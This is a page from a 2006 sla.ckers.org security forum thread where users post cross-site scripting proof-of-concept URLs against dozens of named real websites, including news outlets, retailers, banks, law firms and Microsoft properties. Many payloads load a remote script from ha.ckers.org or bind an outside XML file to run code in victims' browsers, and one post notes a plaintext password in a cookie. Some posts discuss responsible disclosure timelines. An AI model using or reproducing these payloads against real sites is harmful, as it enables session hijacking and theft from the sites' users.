Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920...LastNext
Current Page: 15 of 65
Re: So it begins
Posted by: cheng
Date: October 02, 2006 12:17AM

It's interesting ,Rsnake.
chinatelecom is not that professional company, although it monopolizes telecom markets in China.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www2.chinatelecom.com.cn/send/mailtopresident.php&m_name=%22%3E%3E%3Cscirpt%3Ealert()%3C/scritp%3C

btw, how long do companies like trustE,paypal need to fix their holes?

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: October 02, 2006 03:20AM

>btw, how long do companies like trustE,paypal need to fix their holes?

paypal takes too long, last hole I reported took more than a week and several mails to get fixed.
They don't have a 'standard' security@ mail-address, they don't monitor public mailing lists. In short, they suck at securing their customers.
http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside <-- full of shit

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: October 02, 2006 06:30AM

The last paypal flaws that were posted here I promptly forwarded on to Gadi Evron (he runs securiteam, several mailing lists, ZERT and other things) who I think called them up and let them know, at least he let them know pretty damn quick, he's a kind of guy to have that leeway. I should be able to repeat the process if any of you find any XSSes on similair sites.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: eMole
Date: October 02, 2006 01:29PM

http://www.ircspy.com/search.asp

Search accepting simple XSS queries:
"><script>alert('hi admin'); document.location="http://www.google.de";</scriPT>

Posting a preperated link in the forum would give us success:
http://www.ircspy.com/search.asp?searchtext=%22%3E%3Cscript%3Ealert%28%27hi+admin%27%29%3B+document.location%3D%22http%3A%2F%2Fwww.google.de%22%3B%3C%2FscriPT%3E&pgform=Submit

Since the password is plaintext in the cookie, its a piece of cake...

Status:
-Admin PMed
-fixed

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 02, 2006 02:15PM

http://sitesearch.websidestory.com/?q=XSS+holes%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0

their script that i see in several websites, is usually vulnerable as well _-_

mostly news sites

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 02, 2006 02:28PM

this one affecting the script they sell

http://sitesearch.websidestory.com/?q=%27%29%3Balert%28%27XSS%27%29%3Beval%28%27&x=0&y=0

which you should find in most sites that use it (not always needing to escape parenthesis)

however, some such as breach.com have secured it.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 02, 2006 03:01PM

https://ftn.fedex.com/app/quickfind/QuickFindAction_en.jsp?masterBill=XSS%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: yawnmoth
Date: October 02, 2006 03:26PM

http://www.compsource.com/keywordresult_next.asp?keyword_list=%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E

This one converts the keyword_list variable to uppercase (meaning s.js won't be found), outputs an error message whenever ('s are used, and drops all characters after # (or rather, %23).

So XSS works... I'm just not sure it's demonstratable without hosting a new *.JS file...

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 02, 2006 04:49PM

Hi, Cheng... you know that's a tough question... generally my feelings is 2-4 weeks is the upper limit on how long it should take (any) company to fix an XSS hole given that it takes X time to get the report X time to verify it X time to secure the resources X time to fix it X time to build the release X time to test the release (regress and otherwise) and X time to release it.

Most companies should really be able to do it in far less time. However, most of the companies we are talking about here fit into the first category where the release cycles are mandated and slow (because we generally only report on larger websites). To add another issue, there may be some contractual obligations or auditing standard requirements that won't let certain companies release during "busy" seasons. I've seen that happen in a number of companies (especially online retailers).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 02, 2006 06:11PM

This is not from me but from one of our lurkers (what can I say? We have some kick-ass lurkers here):

USA Today
http://stocks.usatoday.com/custom/usatoday-com/html-story.asp?guid='%7B60C3EDF9-51F0-40D3-A9FE-9CAAAD9F135E%7D

Los Angeles Times
http://markets.latimes.com/custom/tribune-interactive/html-headlines.asp?symb=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Washington Post
http://forums.washingtonpost.com/dir-app/bbcard/profile_center.asp?webtag=wpforums&cType=2&uName=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&dMode=0&eBtn=0&uid=321890205

Chicago Tribune
http://markets.chicagotribune.com/custom/tribune-interactive/html-headlines.asp?symb=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

New York Times
http://realestate.nytimes.com/+ComShare/photoimage.asp?Lid=459-381991&LType=U%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

Kansas City Star
http://weather.kansascity.com/auto/kansascity/radar/mixedcomposite.asp?region=%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

Boston Globe
https://bostonglobe.com/subscriber/offer/go/zipnodel.asp?zip=<script%20src=%22http://ha.ckers.org/s.js%22></script>

New York Post
http://www.nypost.com/search/search.htm?q=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&s=news&t=0

The Washington Times
http://washingtontimes.com/blogs/storyview.php?StoryID=20060502-025032-6098r&TopicsID=t%22><script%20src=http://ha.ckers.org/s.js></script>

ABC
http://app.abc.go.com/keyword/searchResults?search=%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

CBS
http://cgi.cbs.com/feedback/make_form.cgi?name=F%22><script%20src=%22http://ha.ckers.org/s.js%22></script>&email=ftn@cbsnews.com&affiliate=network

Warner Brothers
http://www2.warnerbros.com/web/all/link/partner.jsp?url=javascript:alert('XSS')

PetCo
https://secure.petco.com/Content/HelpPopup.aspx?PC=helppopup&ID=x'),%20alert('XSS

PetSmart
http://www.petsmart.com/global/product_detail.jsp?PRODUCT%3C%3Eprd_id=845524441775473&FOLDER%3C%3Efolder_id=2%22><img%20src=%22foo%22%20onerror=%22alert('XSS')%22>

Warner Brothers Store
http://www.wbshop.com/search/?keywords1='>%0a</script>%0a<script%20src=%22http://ha.ckers.org/s.js%22></script>

Sony Music Store
http://www.sonymusicstore.com/store/catalog/TalentDetails.jsp?talentId=209093XXXXX%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

Nike
http://www.nike.com/nikewomen/index.jsp?skipflashdetection=true&skipflashdetection=X%0a</script><script>alert('XSS')</script>

cafepress
http://www.cafepress.com/buy/aa%3Cimg%20src=foo%20onerror=alert('XSS')%3E/-/cfpt2_/copt_/cfpt_361:fHBa__DB_________bSH_P___D/source_searchBox/x_0/y_15

GNC
http://www.gnc.com/searchHandler/index.jsp?keywords=a%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&query=&x=0&y=0&change_search=products

Shop NBC
http://www.shopnbc.com/searchm/?page=LIST&free_text=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&BreadCrumb=free_text

Linens N Things
http://www.lnt.com/search/noResults.jsp?kw=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E

Netgear
https://www.buynetgear.com/checkoutnew.asp?Section=CHECKOUT_1&shopper=new&billing_country=US&shopper_email=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&shopper_email_confirm=&shopper_password=&shopper_password_confirm=&Action.x=154&Action.y=10

Fingerhut
http://www.fingerhut.com/search.aspx?searchstring=%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&cxid=4

Armani Exchange
http://www.armaniexchange.com/shopping/searchV2/search2.jsp?go=1&code=nav_search&prodname=X%0a%0a%3C/script%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Ritz Camera
http://www.ritzcamera.com/webapp/wcs/stores/servlet/MapQuestView?storeId=10001&catalogId=10001&languageId=-1&city=%22%3E%3Cimg%20src=foo%20onerror=alert('XSS');%3E%0a&state=&zipCode=

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 02, 2006 06:15PM

well that's certainly impressive.. keep up the good work

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: unsticky
Date: October 02, 2006 06:36PM

Edit (Again):
I've removed the wiki Header redirrect, because I found it's actually a big in the wiki script itsself, and I'm going to move to report it.

Edit:
Haha. Just found this one..
[www.fbi.gov]



Edited 2 time(s). Last edit at 10/02/2006 07:45PM by unsticky.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 02, 2006 07:27PM

lol, love the FBI one..

and here is an interesting one.. it includes the registration form processor as a variable. Instead of just routing to it, however, the current asp page submits a POST to it and echos the output back to the page. Thus instead of being a redirect, it loads the page under same origin.

http://www.adidas.com/scripts/cud/cud.asp?call=registeremail&Postprocessor=http://tinyurl.com/jsfzv&dateofbirth_dd=1&dateofbirth_mm=1&dateofbirth_yyyy=1
routed through tinyurl, to change the POST to GET.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: October 02, 2006 09:12PM

Found this
http://techfinder.theinquirer.net/vnuinquirer/SearchServlet?ksAction=Search&col=vnulive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=qt%3A%2522%2Bonmouseover%253Dalert%2528%2527moo%2527%2529%253B@@col%3Avnulive@@type%3Akey@@ptype%3A@@sgroup%3A@@rf%3A0@@tax%3A0@@providerid%3A0@@ssn%3A0@@sid%3A10008348114@@datasource%3AVNUINQUIRER@@bi%3A1%7E%7E&vf=&tId=&sId=10008348114&sSeq=1&regId=&lsTime=null&type=kw&isAdv=false&kw=%22onmouseover%3D%22alert%28%27xss%27%29%3B << requires mouseover on search input box

This is the injection
Quote

" onmouseover="alert('xss');

applies to all site using the http://www.knowledgestorm.com/SearchServlet?ksAction=Search&col=kslive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=null&vf=null&tId=&sId=&sSeq=1&regId=&lsTime=null&isAdv=false&kw=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&x=14&y=7 product which at a glance are these sites


Bank Systems & Technology Research Library
Beverage Industry Research Center
Brand Packaging Research Center
BusinessWeek Technology Solution Finder
Byte.com Research Papers and Reports
Candy Industry Research Center
Channel Web Library
ChannelWeb Product Finder
CommWeb Tech Directory
Computerworld Business Intelligence Guide
Computerworld Buyers' Guide
Computerworld Careers Guide
Computerworld CRM Guide
Computerworld Data Management Guide
Computerworld Development Guide
Computerworld E-business Guide
Computerworld ERP Guide
Computerworld Government Guide
Computerworld Hardware Guide
Computerworld IT Management Guide
Computerworld Mobile & Wireless Guide
Computerworld Networking Guide
Computerworld Operating Systems Guide
Computerworld Outsourcing Guide
Computerworld ROI Guide
Computerworld Security Guide
Computerworld Software Guide
Computerworld Storage Guide
Computerworld Web Site Management Guide
Confectioner Research Center
CRM Buyer
CRMA
CRMindustry.com
CRN Channel Library
CXO America Resource Centre
Dairy Field Research Center
Database Pipeline White Paper Library
Developer Pipeline White Paper Library
Dr.Dobbs Journal Research Center
E-Commerce Times Resource Center
Enterprise Systems
Enterprise Systems White Paper Directory
Flexible Packaging Research Center
Food & Drug Packaging Research Center IT Directory
Fast Company
Forbes
Global Services White Paper Library
Government Computer News
GovernmentEnterprise Vendor Research Library
HR Management Resource Centre
ID Wholesale Distribution Solutions
Inc
InformationWeek White Papers
InfoWorld
Insurance & Technology Research Library
Insurance Journal
Intelligent Enterprise Research Library
InternetWeek Product Finder
InternetWeek White Paper Library
IT Architect Magazine Research Library
IT Business Edge
IT Utility Pipeline White Paper Library
Line56
LinuxInsider Resource Center
Meat & Deli Retailer Research Center
Modern Healthcare
National Provisioner IT Directory
Network Computing Tech Library
Optimize Research Library
Outsourcing Pipeline White Paper Library
Private Label Buyer Research Center
Purchasing.com Technology Finder
Refrigerated & Frozen Foods Research Center
Refrigerated & Frozen Foods Retailer Research Center
RFIDinsights White Paper Library
SC Magazine
Small Business Pipeline Product Finder
Small Business Pipeline White Paper Library
Snack Food & Wholesale Bakery Research Center
Software Magazine
Stagnito's New Products Research Center
StartupJournal.com
SysAdmin Magazine Research Papers and Reports
Tech Decisions White Paper Center
TechNewsWorld Resource Center
TechWeb White Paper Library
UnixReview.com Research Papers and Reports
Wall Street & Technology Research Library
Washington Technology
Windows IT Pro Solution Center

http://search.forbes.com/search/find?action=advancedSearch&start=1&max=20&sort=Relevance&MT=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&pub=forbes.com%2Cmagazine%2Cfyi%2Cbest&author=&tickers=&pubDateStart=mm%2Fdd%2Fyyyy&pubDateEnd=mm%2Fdd%2Fyyyy&contentType=all&storyType=all&premium=on

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 02, 2006 10:23PM

yes, from what i can see, it affects most if not all of those sites listed.. great find.

i prefer to inject style tags instead though, using the injection:
" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss);expression(alert('XSS'))"
String.fromCharCode if single quotes are filtered..

example from your list: http://partners.knowledgestorm.com/rff/SearchServlet?ksAction=Search&col=kslive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=qt%3Aasdf%2527e%2522eee%40%40col%3Akslive%40%40type%3Akey%40%40ptype%3A%40%40sgroup%3A%40%40rf%3A0%40%40tax%3A0%40%40providerid%3A0%40%40ssn%3A0%40%40sid%3A613051320%40%40datasource%3ARFF%40%40bi%3A1%7E%7E&vf=&tId=&sId=613051320&sSeq=1&regId=&lsTime=null&isAdv=false&type=key&kw=asdf%27e%22+style%3D%22-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29;xx:expression(alert(String.fromCharCode(88,83,83)))%22+ which will auto execute in both FF and IE..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: October 02, 2006 10:26PM

thanks for that maluc - i guess i really need to looking at different methods for injecting.

http://www.britannica.com/search?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&ct=&searchSubmit.x=0&searchSubmit.y=0
http://sitesearch.websidestory.com/?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 10/02/2006 10:30PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 02, 2006 11:38PM

More from a different lurker than last time (yup, it's confirmed we have cool lurkers). These are his words, not mine:

JC Penney's
http://www2.jcpenney.com/jcp/SearchDepartment.aspx?SearchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&JSEnabled=true&submit+search.x=5&submit+search.y=9

Sears
http://www.sears.com/sr/javasr/search.do?BV_UseBVCookie=Yes&vertical=Sears&keyword=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&gobutton.x=9&gobutton.y=15

CBS News
http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?source=cbsnews&searchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&sort=1&type=all&num=10&offset=0&x=22&y=10

Foley law firm
This probably has to be modified because of the stateful nature of the link. But I'm not smart enough for that.
http://www.foley.com/sitesearch.aspx?__VIEWSTATE=dDwtMTAxNzE5NTIxODt0PDtsPGk8MT47aTwyPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHNwYW4gY2xhc3M9InRleHQxIlw%2BTG9va2luZyBmb3Igc29tZXRoaW5nIHNwZWNpZmljPyBTaW1wbHkgdHlwZSBhIHdvcmQgb3IgcGhyYXNlLCBjaG9vc2UgYSBzaXRlIHNlY3Rpb24gKG9yIGVudGlyZSBzaXRlKSwgdGhlbiBjbGljayB0aGUgU2VhcmNoIGJ1dHRvbi4gUGxlYXNlIGVuY2xvc2UgcGhyYXNlIHNlYXJjaGVzIGluIGRvdWJsZSBxdW90ZXMgZm9yIGdyZWF0ZXIgYWNjdXJhY3kuXDwvc3Bhblw%2BOz4%2BOz47Oz47dDw7bDxpPDU%2BOz47bDx0PHA8bDxUZXh0Oz47bDxcZTs%2BPjs7Pjs%2BPjs%2BPjs%2BgObD42gh%2Ba%2FMi1aqHRdfBrCPKY0%3D&SearchType=1&txtSearch=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&selSection=&submit.x=18&submit.y=6

Findlaw
http://lawyers.findlaw.com/lawyer/lawyer_dir/search/jsp/stdSearch_process.jsp?stype=BY_ADDR_OR_ZIP&target=FIRM&keyword=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&location=chicago%2C+il&Submit=Find+Lawyers%21

A LexisNexis company - lawfirm finder:
http://www.martindale.com/xp/Martindale/Lawyer_Locator/Search_Lawyer_Locator/search_result.xml?PG=0&STYPE=F&FNAME=&LNAME=&FN=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&CN=&STS=1&CRY=1&ratind=&bc=1

Another law firm:
http://www.twobirds.com/english/search/search_results.cfm?srchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&search.x=9&search.y=10

A county bank
http://www.boonebank.com/app/search.jsp?searchAction=search&search=glossary&searchglossary=search&searchtext=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E

World Bank
http://web.worldbank.org/external/default/main?menuPK=140710&pagePK=36912&piPK=36916&q=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&theSitePK=4607

Bank Of Ireland
http://www.bankofireland.ie/site-search/htsearch?words=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&Submit=GO

MapQuest
http://www.mapquest.com/maps/map.adp?formtype=address&country=US&popflag=0&latitude=&longitude=&name=&phone=&level=&addtohistory=&cat=%3Cscript%3Ealert%28%27GeeWiz%27%29%3C%2Fscript%3E&address=&city=&state=&zipcode=

Another bank (US branch of a Gaza, Lebanon)
http://www.chfhq.org/section/_search/?search_query=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&x=9&y=8

New York State Banking Department:
http://www.banking.state.ny.us/cgi-bin/AT-HTML_Docssearch.cgi?sp=sp&mode=concept&search=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&Search.x=83&Search.y=9

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: October 03, 2006 05:39AM

https://adcenter.microsoft.com/signup.aspx?adv_market=en-us%22;alert(1);s_account=%22&s_int=118

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: October 03, 2006 07:30AM

I have a xss q:
consider following html injection:
http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style="background-image:url(javascript:alert(2))">
this results in
<input type="text" value="" style="background-image:url(javascript:alert(2))">
why don't I get a pop-up on the msn site while the same tag does execute js in a clean html doc?

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: October 03, 2006 08:33AM

[[url=http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style=%22background-image:url(javascript:alert(2))%22%3E]moneycentral.msn[/url]]
Does give me an alert (obviously only in IE)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 03, 2006 10:13AM

Yup, works for me too (in IE). The reason it doesn't work in Firefox is because the JavaScript: directive is not allowed in that context in Firefox. There are only a few places JavaScript: will work in Firefox and CSS just isn't one of them.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 03, 2006 01:29PM

http://walmartstores.com/GlobalWMStoresWeb/search.do?subcatid=316&simplesearchfor=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 03, 2006 02:18PM

http://www.target.com/gp/flex/sign-in.html/601-2051186-0950531?&step=new&protocol=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert('XSS')%29

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 03, 2006 02:37PM

http://khelp.kohls.com/default.asp?question=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%0D%0A&a=e-faqs-results

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 03, 2006 06:45PM

http://www.videolan.org/mirror.php?mirror=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&file=

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: yawnmoth
Date: October 03, 2006 08:10PM

Regarding the lurkers who contribute stuff... it occurs to me that it may be possible to glean some new XSS exploits by looking at this websites server logs. ie. look at the referer of any calls to http://ha.ckers.org/s.js.

This isn't the source of some of our lurkers, is it?

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: October 04, 2006 04:11AM

http://lifestyle.msn.com/HomeandGarden/BeJane/Article.aspx?cp-documentid=';alert(1);s='nn



Edited 1 time(s). Last edit at 10/04/2006 04:11AM by thomaspollet.

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: October 04, 2006 10:24AM

acunetix :p POST

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 04, 2006 10:27AM

yawnmoth - you're exactly right, but I intentionally try not to look at those for two reasons 1) it would discourage people from using it for testing and 2) it's a lot of garbage mixed in with good stuff. For instance a few times I've seen people clicking on an actual link taking them to xss.js (rather than actually executing it). There's no (easy) way to know if it's actually been executed or not. But yes, in theory you're right.

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: October 04, 2006 10:53AM

thomaspollet, I guess that's a vulnerability by design, it's the testsite configured by default in WVS, it's simply supposed to be found ;-)

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920...LastNext
Current Page: 15 of 65


Sorry, only registered users may post in this forum.